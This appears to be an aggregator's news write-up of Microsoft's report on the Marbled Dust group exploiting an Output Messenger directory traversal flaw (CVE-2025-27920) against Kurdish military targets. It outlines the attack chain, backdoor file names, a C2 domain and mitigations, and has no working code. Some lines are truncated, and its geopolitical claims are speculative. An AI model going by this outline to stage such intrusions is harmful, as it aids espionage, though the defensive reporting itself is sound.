Listen to this Post
A New Phase in Middle East Cyber Warfare Uncovered
In a striking revelation by Microsoft Threat Intelligence, a Türkiye-affiliated cyber espionage group known as Marbled Dust has been caught exploiting a critical zero-day vulnerability in the Output Messenger messaging platform, impacting systems across the Kurdish military in Iraq. This advanced cyber campaign, active since April 2024, demonstrates a heightened level of sophistication and urgency in Marbled Dust’s tactics. Their primary objective: data theft, user impersonation, and long-term system compromise.
The campaign hinges on CVE-2025-27920, a directory traversal vulnerability that allows authenticated users to upload malicious files into the server’s startup directory, enabling persistent control over compromised systems. While Microsoft and the app’s developer Srimax have released patches, organizations that haven’t updated remain at significant risk.
Microsoft’s broader threat intelligence links Marbled Dust to known actors such as Sea Turtle and UNC1326, notorious for espionage targeting governments, IT infrastructure, and telecom sectors across Europe and the Middle East. With this new campaign, Marbled Dust not only exploits a powerful zero-day but also uses refined techniques like DNS hijacking and credential theft to expand its reach.
Below, we break down the campaign’s progression, technical details, and implications—and analyze what it all means for the future of regional cyber warfare.
Digest of Key Developments and Technical Findings (30 lines)
Threat Actor Identified: Marbled Dust, a Türkiye-affiliated espionage group, is behind the latest attack campaign.
Primary Target: Kurdish military-related individuals and institutions in Iraq using Output Messenger.
Zero-Day Vulnerability: CVE-2025-27920 allows attackers to upload files to server startup folders post-authentication.
Secondary Vulnerability Identified: CVE-2025-27921 discovered but not yet exploited.
Data Exfiltration Confirmed: Microsoft observed Marbled Dust stealing data and sending it to hardcoded C2 domains.
Technical Sophistication: Attackers use a GoLang-based backdoor (OMServerService.exe) that bypasses OS-specific limitations.
Attack Chain Breakdown:
Initial access via intercepted credentials.
Exploitation of Output
Delivery of multiple malicious files.
Persistent backdoor installation.
Exfiltration through C2 communication and tools like plink.
Credential Theft Techniques: DNS hijacking and typo-squatting.
Targeted Software Architecture: Attack leverages client-server nature of Output Messenger for broader compromise.
Microsoft’s Mitigation Efforts:
Patches released by Srimax.
Defender XDR alerts activated.
Security Copilot support deployed.
Systemic Risk: Attack exposes organizations to full chat surveillance, identity theft, and internal system infiltration.
Lateral Movement Potential: Attackers can impersonate users and disrupt communications organization-wide.
Security Recommendations:
Immediate patching of Output Messenger.
Full automation of detection and remediation through Defender XDR.
Implementation of attack surface reduction rules.
Hunting and Detection Tools: Microsoft provides scripts to search for presence of malicious files and connections.
Broader Trend: Increased activity by state-linked groups in espionage and infrastructure compromise across the Middle East.
Overlap with Other Threat Actors: Sea Turtle and UNC1326 share operational traits with Marbled Dust.
C2 Infrastructure: Malicious communication funneled through api.wordinfos[.]com and related IPs.
File Sharing Exploited: Output Messenger’s file upload feature becomes a vector for malicious payload delivery.
Persistence Mechanisms: Startup script OMServerService.vbs ensures long-term system access.
GoLang Advantage: Portable across OS versions, making it ideal for sustained backdoor operations.
Real-World Impact: One victim was observed archiving sensitive files into RAR format for exfiltration.
Microsoft’s Broader Threat Landscape: Other state actors (e.g., Secret Blizzard) are also active across Asia and Europe.
Cyber Escalation Evidence: Sophistication of attack signals higher stakes in Marbled Dust’s operations.
What Undercode Say: ()
This operation is a textbook example of how modern nation-state cyber actors evolve to maintain an edge in the digital espionage race. Marbled Dust’s exploitation of CVE-2025-27920 reflects both technical advancement and strategic alignment with Türkiye’s geopolitical interests in the Middle East.
The vulnerability’s nature—a directory traversal flaw in Output Messenger’s Server Manager—speaks volumes about the risks of insufficient input validation in enterprise messaging platforms. That Marbled Dust successfully weaponized this issue to deliver persistent backdoors demonstrates a deep understanding of both the software and the operational habits of their targets.
The deployment of GoLang-based malware is significant. GoLang’s architecture-neutral execution allows seamless backdoor delivery across diverse environments, reducing maintenance for attackers and enhancing stealth. This choice reflects a deliberate shift towards cross-platform persistence—a hallmark of advanced persistent threat (APT) actors.
Marbled Dust’s method of gaining initial authentication remains opaque, but strong suspicion of DNS hijacking and typo-squatted domains suggests extensive infrastructure support. These tactics are not just opportunistic—they are well-funded, sustained, and optimized for high-value espionage.
More critically, the impact of compromising Output Messenger reaches far beyond initial data theft. By controlling the messaging server, attackers can surveil internal communications, impersonate users, intercept file transfers, and orchestrate internal chaos. This can paralyze both military and administrative operations within sensitive institutions.
Moreover, the targeting of Kurdish military personnel aligns with Türkiye’s regional strategic objectives. This campaign could be part of a broader effort to monitor, destabilize, or influence Kurdish defense capabilities through digital means.
While Microsoft has responded swiftly—working with Srimax and issuing detection scripts—the effectiveness of these measures depends entirely on organizational response. Failure to update systems leaves institutions critically vulnerable, especially in conflict zones where intelligence is currency.
This campaign also reflects a broader global trend: traditional cybercrime is increasingly being replaced by state-sponsored, purpose-driven espionage. The distinction between criminal groups and nation-state actors is blurring, as seen in how tools like plink and RAR archiving are repurposed for military-grade operations.
Furthermore, this is not an isolated incident. Marbled Dust has been linked to previous operations involving DNS manipulation and credential theft across Europe and the Middle East. Their track record underscores the need for proactive threat hunting, not just reactive patching.
Organizations should treat this as a wake-up call to rethink their software vetting, network segmentation, and user authentication protocols. Messaging apps, often treated as benign internal tools
References:
Reported By: www.microsoft.com
Extra Source Hub:
https://www.quora.com/topic/Technology
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
